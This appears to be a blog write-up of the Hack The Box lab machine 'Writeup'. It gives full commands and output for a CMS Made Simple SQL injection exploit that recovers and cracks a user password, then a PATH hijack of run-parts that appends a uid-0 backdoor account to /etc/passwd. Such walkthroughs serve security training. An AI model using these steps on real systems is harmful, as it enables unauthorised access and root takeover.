Hack The Box - Writeup

Quick Summary

Hey guys, today writeup retired and here’s my write-up about it. It was a very nice box and I enjoyed it. It’s a Linux box and its ip is 10.10.10.138, I added it to /etc/hosts as writeup.htb. Let’s jump right in !

Nmap

As always we will start with nmap to scan for open ports and services :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@kali:~/Desktop/HTB/boxes/writeup# nmap -sV -sT -sC -o nmapinitial writeup.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-11 16:03 EET
Nmap scan report for writeup.htb (10.10.10.138)
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.71 seconds

We got http on port 80 and ssh on port 22. On port 80 nmap found /robots.txt with a disallowed entry for /writeup.

Web Enumeration

http://writeup.htb

The index page says that the website is not ready yet, it also says that there’s a dos protection script so we won’t bruteforce anything.
Let’s check /writeup :

/writeup is the write-ups page and as the index page said, it’s still not ready yet and that’s why it was disallowed in robots.txt.
I checked wappalyzer‘s results and saw that it’s using a cms called CMS Made Simple :

Without wappalyzer we can still identify that by looking at the source of the page :

1
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />

SQLi, User Flag

I searched for exploits for CMS Made Simple, and because the version was from 2019 (Copyright (C) 2004-2019) I searched only for exploits in 2019.
I found this sql injection exploit so I gave it a try.
I set the time to 3 :

1
TIME = 3

Then I ran the exploit :

1
2
3
4
5
6
7
root@kali:~/Desktop/HTB/boxes/writeup# python 46635.py -u http://writeup.htb/writeup/ --crack -w /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

Now we can ssh into the box as jkr : raykayjay9 :

We owned user.

Hijacking run-parts, Root Flag

I downloaded pspy32 on the box and ran it to monitor the processes, I noticed the following :

1
2
3
4
5
6
7
2019/10/11 10:35:58 CMD: UID=0    PID=2279   | sshd: [accepted]
2019/10/11 10:35:58 CMD: UID=102 PID=2280 | sshd: [net]
2019/10/11 10:36:00 CMD: UID=0 PID=2281 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2019/10/11 10:36:00 CMD: UID=0 PID=2282 | run-parts --lsbsysinit /etc/update-motd.d
2019/10/11 10:36:00 CMD: UID=0 PID=2283 | /bin/sh /etc/update-motd.d/10-uname
2019/10/11 10:36:00 CMD: UID=0 PID=2284 | /bin/sh /etc/update-motd.d/10-uname
2019/10/11 10:36:00 CMD: UID=0 PID=2285 | sshd: jkr [priv]

Every successful ssh login :

1
2
sshd: [accepted]
sshd: [net]

These commands get executed :

1
2
3
4
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new          
run-parts --lsbsysinit /etc/update-motd.d
/bin/sh /etc/update-motd.d/10-uname
/bin/sh /etc/update-motd.d/10-uname

When I checked jkr‘s groups I saw that jkr was in a group called staff :

1
2
jkr@writeup:/tmp$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

And staff members could write to /usr/local/bin :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
jkr@writeup:/tmp$ find / -group staff 2>/dev/null
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/man
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin

By default run-parts was in /bin :

1
2
jkr@writeup:/tmp$ which run-parts
/bin/run-parts

But if we take a look at the env command that sets the path every ssh login we’ll see that /usr/bin/local is before /usr/bin :

1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Which means that we can put an executable of our choice in /usr/local/bin and call it run-parts, then ssh into the box again and our fake run-parts will be executed as root.
I wrote a bash script that echoes :

1
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash

to /etc/passwd which will add a new user rooot : AAAA with uid 0. (same from the previous post)

1
2
3
4
5
6
7
8
jkr@writeup:/usr/local/bin$ nano run-parts
jkr@writeup:/usr/local/bin$ chmod +x run-parts
jkr@writeup:/usr/local/bin$ cat run-parts
#!/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
jkr@writeup:/usr/local/bin$ which run-parts
/usr/local/bin/run-parts
jkr@writeup:/usr/local/bin$

Then I started a new ssh session and the script was successfully executed :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
root@kali:~/Desktop/HTB/boxes/writeup# ssh jkr@writeup.htb
jkr@writeup.htb's password:

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 11 10:48:16 2019 from 10.10.xx.xx
jkr@writeup:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
messagebus:x:101:104::/var/run/dbus:/bin/false
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
jkr:x:1000:1000:jkr,,,:/home/jkr:/bin/bash
mysql:x:103:106:MySQL Server,,,:/nonexistent:/bin/false
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
jkr@writeup:~$ su rooot
Password:
root@writeup:/home/jkr# whoami
root


And We owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Ghoul
Next Hack The Box write-up : Hack The Box - Ellingson